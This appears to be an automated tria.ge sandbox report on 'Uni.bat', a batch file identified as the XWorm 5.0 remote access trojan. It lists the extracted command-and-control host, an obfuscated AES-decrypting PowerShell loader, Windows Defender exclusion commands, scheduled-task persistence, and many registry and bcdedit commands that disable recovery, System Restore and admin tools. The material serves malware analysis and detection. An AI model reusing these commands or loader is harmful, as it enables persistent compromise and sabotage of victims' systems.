Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
298s -
max time network
300s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
25/08/2024, 06:57
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240611-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win11-20240802-en
General
-
Target
Uni.bat
-
Size
359KB
-
MD5
358406bc7ed5155f85a5ff1c578ee295
-
SHA1
4e333529ae320ad77ebcc36fd9baa55796dc001d
-
SHA256
da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf
-
SHA512
0017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45
-
SSDEEP
6144:ZbaZI71pQSxrJ9chRObtodtQlcxWHovdigPbYDDV:Zbac1ySxr/3bU3FzUh
Malware Config
Extracted
xworm
5.0
las-protected.gl.at.ply.gg:59571
bDBtf4nPCk2LZaWE
-
Install_directory
%Userprofile%
-
install_file
Uni.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/696-47-0x0000015BF56E0000-0x0000015BF56F0000-memory.dmp family_xworm -
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 4360 bcdedit.exe 2544 bcdedit.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 10 696 powershell.exe 11 696 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4564 powershell.exe 4128 powershell.exe 4256 powershell.exe 3272 powershell.exe 3324 powershell.exe 1456 powershell.exe 696 powershell.exe -
Disables RegEdit via registry modification 1 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" reg.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk powershell.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Uni.lnk powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 124 Uni.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000\Software\Microsoft\Windows\CurrentVersion\Run\Uni = "C:\\Users\\Admin\\Uni.exe" powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\Recovery ReAgentc.exe File opened for modification C:\Windows\system32\Recovery\ReAgent.xml ReAgentc.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File opened for modification C:\Windows\Logs\ReAgent\ReAgent.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml ReAgentc.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml ReAgentc.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1544 sc.exe 4480 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-6179872-1886041298-1573312864-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 17 IoCs
pid Process 3324 powershell.exe 3324 powershell.exe 1456 powershell.exe 1456 powershell.exe 696 powershell.exe 696 powershell.exe 4128 powershell.exe 4128 powershell.exe 4256 powershell.exe 4256 powershell.exe 3272 powershell.exe 3272 powershell.exe 4564 powershell.exe 4564 powershell.exe 696 powershell.exe 124 Uni.exe 124 Uni.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3324 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1456 powershell.exe Token: SeSecurityPrivilege 1456 powershell.exe Token: SeTakeOwnershipPrivilege 1456 powershell.exe Token: SeLoadDriverPrivilege 1456 powershell.exe Token: SeSystemProfilePrivilege 1456 powershell.exe Token: SeSystemtimePrivilege 1456 powershell.exe Token: SeProfSingleProcessPrivilege 1456 powershell.exe Token: SeIncBasePriorityPrivilege 1456 powershell.exe Token: SeCreatePagefilePrivilege 1456 powershell.exe Token: SeBackupPrivilege 1456 powershell.exe Token: SeRestorePrivilege 1456 powershell.exe Token: SeShutdownPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeSystemEnvironmentPrivilege 1456 powershell.exe Token: SeRemoteShutdownPrivilege 1456 powershell.exe Token: SeUndockPrivilege 1456 powershell.exe Token: SeManageVolumePrivilege 1456 powershell.exe Token: 33 1456 powershell.exe Token: 34 1456 powershell.exe Token: 35 1456 powershell.exe Token: 36 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1456 powershell.exe Token: SeSecurityPrivilege 1456 powershell.exe Token: SeTakeOwnershipPrivilege 1456 powershell.exe Token: SeLoadDriverPrivilege 1456 powershell.exe Token: SeSystemProfilePrivilege 1456 powershell.exe Token: SeSystemtimePrivilege 1456 powershell.exe Token: SeProfSingleProcessPrivilege 1456 powershell.exe Token: SeIncBasePriorityPrivilege 1456 powershell.exe Token: SeCreatePagefilePrivilege 1456 powershell.exe Token: SeBackupPrivilege 1456 powershell.exe Token: SeRestorePrivilege 1456 powershell.exe Token: SeShutdownPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeSystemEnvironmentPrivilege 1456 powershell.exe Token: SeRemoteShutdownPrivilege 1456 powershell.exe Token: SeUndockPrivilege 1456 powershell.exe Token: SeManageVolumePrivilege 1456 powershell.exe Token: 33 1456 powershell.exe Token: 34 1456 powershell.exe Token: 35 1456 powershell.exe Token: 36 1456 powershell.exe Token: SeIncreaseQuotaPrivilege 1456 powershell.exe Token: SeSecurityPrivilege 1456 powershell.exe Token: SeTakeOwnershipPrivilege 1456 powershell.exe Token: SeLoadDriverPrivilege 1456 powershell.exe Token: SeSystemProfilePrivilege 1456 powershell.exe Token: SeSystemtimePrivilege 1456 powershell.exe Token: SeProfSingleProcessPrivilege 1456 powershell.exe Token: SeIncBasePriorityPrivilege 1456 powershell.exe Token: SeCreatePagefilePrivilege 1456 powershell.exe Token: SeBackupPrivilege 1456 powershell.exe Token: SeRestorePrivilege 1456 powershell.exe Token: SeShutdownPrivilege 1456 powershell.exe Token: SeDebugPrivilege 1456 powershell.exe Token: SeSystemEnvironmentPrivilege 1456 powershell.exe Token: SeRemoteShutdownPrivilege 1456 powershell.exe Token: SeUndockPrivilege 1456 powershell.exe Token: SeManageVolumePrivilege 1456 powershell.exe Token: 33 1456 powershell.exe Token: 34 1456 powershell.exe Token: 35 1456 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 696 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4852 wrote to memory of 3076 4852 cmd.exe 82 PID 4852 wrote to memory of 3076 4852 cmd.exe 82 PID 3076 wrote to memory of 3416 3076 net.exe 83 PID 3076 wrote to memory of 3416 3076 net.exe 83 PID 4852 wrote to memory of 3324 4852 cmd.exe 85 PID 4852 wrote to memory of 3324 4852 cmd.exe 85 PID 3324 wrote to memory of 1456 3324 powershell.exe 87 PID 3324 wrote to memory of 1456 3324 powershell.exe 87 PID 3324 wrote to memory of 4372 3324 powershell.exe 89 PID 3324 wrote to memory of 4372 3324 powershell.exe 89 PID 4372 wrote to memory of 644 4372 WScript.exe 90 PID 4372 wrote to memory of 644 4372 WScript.exe 90 PID 644 wrote to memory of 3460 644 cmd.exe 92 PID 644 wrote to memory of 3460 644 cmd.exe 92 PID 3460 wrote to memory of 1388 3460 net.exe 93 PID 3460 wrote to memory of 1388 3460 net.exe 93 PID 644 wrote to memory of 696 644 cmd.exe 94 PID 644 wrote to memory of 696 644 cmd.exe 94 PID 696 wrote to memory of 4128 696 powershell.exe 95 PID 696 wrote to memory of 4128 696 powershell.exe 95 PID 696 wrote to memory of 4256 696 powershell.exe 97 PID 696 wrote to memory of 4256 696 powershell.exe 97 PID 696 wrote to memory of 3272 696 powershell.exe 99 PID 696 wrote to memory of 3272 696 powershell.exe 99 PID 696 wrote to memory of 4564 696 powershell.exe 101 PID 696 wrote to memory of 4564 696 powershell.exe 101 PID 696 wrote to memory of 3408 696 powershell.exe 103 PID 696 wrote to memory of 3408 696 powershell.exe 103 PID 696 wrote to memory of 4488 696 powershell.exe 113 PID 696 wrote to memory of 4488 696 powershell.exe 113 PID 4488 wrote to memory of 3488 4488 cmd.exe 115 PID 4488 wrote to memory of 3488 4488 cmd.exe 115 PID 4488 wrote to memory of 5096 4488 cmd.exe 116 PID 4488 wrote to memory of 5096 4488 cmd.exe 116 PID 4488 wrote to memory of 1992 4488 cmd.exe 117 PID 4488 wrote to memory of 1992 4488 cmd.exe 117 PID 4488 wrote to memory of 1532 4488 cmd.exe 118 PID 4488 wrote to memory of 1532 4488 cmd.exe 118 PID 4488 wrote to memory of 3188 4488 cmd.exe 119 PID 4488 wrote to memory of 3188 4488 cmd.exe 119 PID 4488 wrote to memory of 4360 4488 cmd.exe 120 PID 4488 wrote to memory of 4360 4488 cmd.exe 120 PID 4488 wrote to memory of 1520 4488 cmd.exe 121 PID 4488 wrote to memory of 1520 4488 cmd.exe 121 PID 4488 wrote to memory of 2036 4488 cmd.exe 122 PID 4488 wrote to memory of 2036 4488 cmd.exe 122 PID 4488 wrote to memory of 3408 4488 cmd.exe 123 PID 4488 wrote to memory of 3408 4488 cmd.exe 123 PID 4488 wrote to memory of 820 4488 cmd.exe 124 PID 4488 wrote to memory of 820 4488 cmd.exe 124 PID 4488 wrote to memory of 3504 4488 cmd.exe 125 PID 4488 wrote to memory of 3504 4488 cmd.exe 125 PID 4488 wrote to memory of 4660 4488 cmd.exe 126 PID 4488 wrote to memory of 4660 4488 cmd.exe 126 PID 4488 wrote to memory of 936 4488 cmd.exe 127 PID 4488 wrote to memory of 936 4488 cmd.exe 127 PID 4488 wrote to memory of 1948 4488 cmd.exe 128 PID 4488 wrote to memory of 1948 4488 cmd.exe 128 PID 4488 wrote to memory of 4776 4488 cmd.exe 129 PID 4488 wrote to memory of 4776 4488 cmd.exe 129 PID 4488 wrote to memory of 3544 4488 cmd.exe 130 PID 4488 wrote to memory of 3544 4488 cmd.exe 130 PID 4488 wrote to memory of 4108 4488 cmd.exe 131 PID 4488 wrote to memory of 4108 4488 cmd.exe 131 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4852 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:3416
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_771_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_771.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_771.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4372 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_771.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:3460 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:1388
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FCWcthcvES5kWtKK+zyMWPaI12cI41cfQ1vED+zLcNQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Wi091llD0HYkl0mjuqK1Mw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dIHUu=New-Object System.IO.MemoryStream(,$param_var); $WlPMS=New-Object System.IO.MemoryStream; $ppSDL=New-Object System.IO.Compression.GZipStream($dIHUu, [IO.Compression.CompressionMode]::Decompress); $ppSDL.CopyTo($WlPMS); $ppSDL.Dispose(); $dIHUu.Dispose(); $WlPMS.Dispose(); $WlPMS.ToArray();}function execute_function($param_var,$param2_var){ $AbXeo=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MiFGd=$AbXeo.EntryPoint; $MiFGd.Invoke($null, $param2_var);}$AMhPZ = 'C:\Users\Admin\AppData\Roaming\startup_str_771.bat';$host.UI.RawUI.WindowTitle = $AMhPZ;$pvMmn=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($AMhPZ).Split([Environment]::NewLine);foreach ($CTBGC in $pvMmn) { if ($CTBGC.StartsWith(':: ')) { $lWiIS=$CTBGC.Substring(3); break; }}$payloads_var=[string[]]$lWiIS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:696 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4128
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4256
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\Uni.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3272
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Uni.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4564
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Uni" /tr "C:\Users\Admin\Uni.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:3408
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fhycjt.bat" "6⤵
- Suspicious use of WriteProcessMemory
PID:4488 -
C:\Windows\system32\ReAgentc.exereagentc /disable7⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:3488
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f7⤵PID:5096
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableResetPC" /t REG_DWORD /d 1 /f7⤵PID:1992
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f7⤵PID:1532
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsSetupOptions" /t REG_DWORD /d 1 /f7⤵PID:3188
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures7⤵
- Modifies boot configuration data using bcdedit
PID:4360
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d 1 /f7⤵PID:1520
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AutoRestartShell" /t REG_DWORD /d 0 /f7⤵PID:2036
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f7⤵PID:3408
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f7⤵PID:820
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f7⤵PID:3504
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /t REG_DWORD /d 2 /f7⤵PID:4660
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f7⤵
- Disables RegEdit via registry modification
PID:936
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Remote Assistance" /v "fAllowToGetHelp" /t REG_DWORD /d 0 /f7⤵PID:1948
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting" /v "Disabled" /t REG_DWORD /d 1 /f7⤵PID:4776
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "DisallowCPL" /t REG_DWORD /d 1 /f7⤵PID:3544
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoThemesTab" /t REG_DWORD /d 1 /f7⤵PID:4108
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoDispSettings" /t REG_DWORD /d 1 /f7⤵PID:760
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f7⤵PID:3176
-
-
C:\Windows\system32\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoWindowsUpdate" /t REG_DWORD /d 1 /f7⤵PID:3028
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\MiniNT" /v "NoWinRE" /t REG_DWORD /d 1 /f7⤵PID:4880
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No7⤵
- Modifies boot configuration data using bcdedit
PID:2544
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v "Hidden" /t REG_DWORD /d 2 /f7⤵PID:5108
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\WinRE" /v "DisableStatusMessages" /t REG_DWORD /d 1 /f7⤵PID:3372
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute" /v "AutoChk" /t REG_MULTI_SZ /d "" /f7⤵PID:424
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f7⤵PID:772
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinREBootIndex" /Disable7⤵PID:4940
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "\Microsoft\Windows\WinRE\WinRECleanup" /Disable7⤵PID:4968
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Services\sr" /v "Start" /t REG_DWORD /d 4 /f7⤵PID:3600
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\CrashControl" /v "AutoReboot" /t REG_DWORD /d 0 /f7⤵PID:2836
-
-
C:\Windows\system32\sc.exesc config wercplsupport start=disabled7⤵
- Launches sc.exe
PID:4480
-
-
C:\Windows\system32\sc.exesc config WerSvc start=disabled7⤵
- Launches sc.exe
PID:1544
-
-
-
-
-
-
-
C:\Users\Admin\Uni.exeC:\Users\Admin\Uni.exe1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:124
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD57c6fe7c423380b59d82d999572ed03d1
SHA14a07399f1714b5cfaea2f92a952d1f4473c216ae
SHA256acc79cc65eaea62a945398adad81cb5615e1480fa659c904aa5cd450165c3d66
SHA5126e617a604568bafa22773bd3dab3b681ccfd6869ded8e11802cbbdd9ea71d4998e2a1bfcdcf07c4ec473c3b028fe593448a33e7e9c904792221e89fb8359d665
-
Filesize
1KB
MD56ed6547d270ec2a3219183bfa73bc09b
SHA1efbcbdbdccab903a79b2b0a65d882eca8bb81363
SHA256f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2
SHA512d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72
-
Filesize
944B
MD51a9fa92a4f2e2ec9e244d43a6a4f8fb9
SHA19910190edfaccece1dfcc1d92e357772f5dae8f7
SHA2560ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888
SHA5125d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64
-
Filesize
944B
MD5fb7bab8a7df1534bf72a828c80bedafd
SHA18a16ed89ab9be4bc268a216d766657c145c904db
SHA256cba5f5393d4fb84307f346daf784565732dc6ff11924d90c12b94039b91b5f8f
SHA5129dd3796c61e2edff0780687d47325377f89319ca76ed7de60a12787e8830b901bb3353705b88b06a3c1640af7d268bb428f14a06ffb5c26e7c7891b53f421a92
-
Filesize
944B
MD5f8c40f7624e23fa92ae2f41e34cfca77
SHA120e742cfe2759ac2adbc16db736a9e143ca7b677
SHA256c51a52818a084addbfa913d2bb4bb2b0e60c287a4cf98e679f18b8a521c0aa7b
SHA512f1da3ec61403d788d417d097a7ed2947203c6bff3cf1d35d697c31edecdf04710b3e44b2aa263b886e297b2ce923fea410ccc673261928f1d0cd81252740dbe7
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5ecde221cbc92ee55ae5b8c1a24e98f56
SHA1ebda0dba4abcd3bf93183e2787cc9e5f9f1448ee
SHA256b6fbab33e31d0a525d4c752886d812c1c46477f6314da7bde25bdc8198cb70cb
SHA512122673ad96f1e407c75a93672f6538f342499f4e14221cbe4103c601362667487f3f33800230572e255b55e691e5068adce6336a4ffe1a651bff465d2c2d3493
-
Filesize
359KB
MD5358406bc7ed5155f85a5ff1c578ee295
SHA14e333529ae320ad77ebcc36fd9baa55796dc001d
SHA256da95cdaddcd020f216d54f93ebb9f0c8246b9dc1d02d9df60d898bc6c58e8ecf
SHA5120017064f87d9b5458e17c7e7348aa1ad0a3b1713ae44c202ab71e271b6a8a76bed7a3142cebe0b4a10c08220fbfae4f109a784151ca85130d48dbcb4dee65f45
-
Filesize
115B
MD50e55927f429063811a190d04794df2f6
SHA1bfaee1af4ef1ad68e72c193c70f3cdec52f7c5cc
SHA25621427c7ad9eadc7121a87505073598ab7674a940626c9eff320a0a043733f513
SHA512f54b744ce29fc485377542e84ed798288e3eac4c0b9c356cbd8795bf9019614fd10bbdb361b7248457890d50c463a84905b15627cc3db0cfa1ab6c2c33823f33
-
Filesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d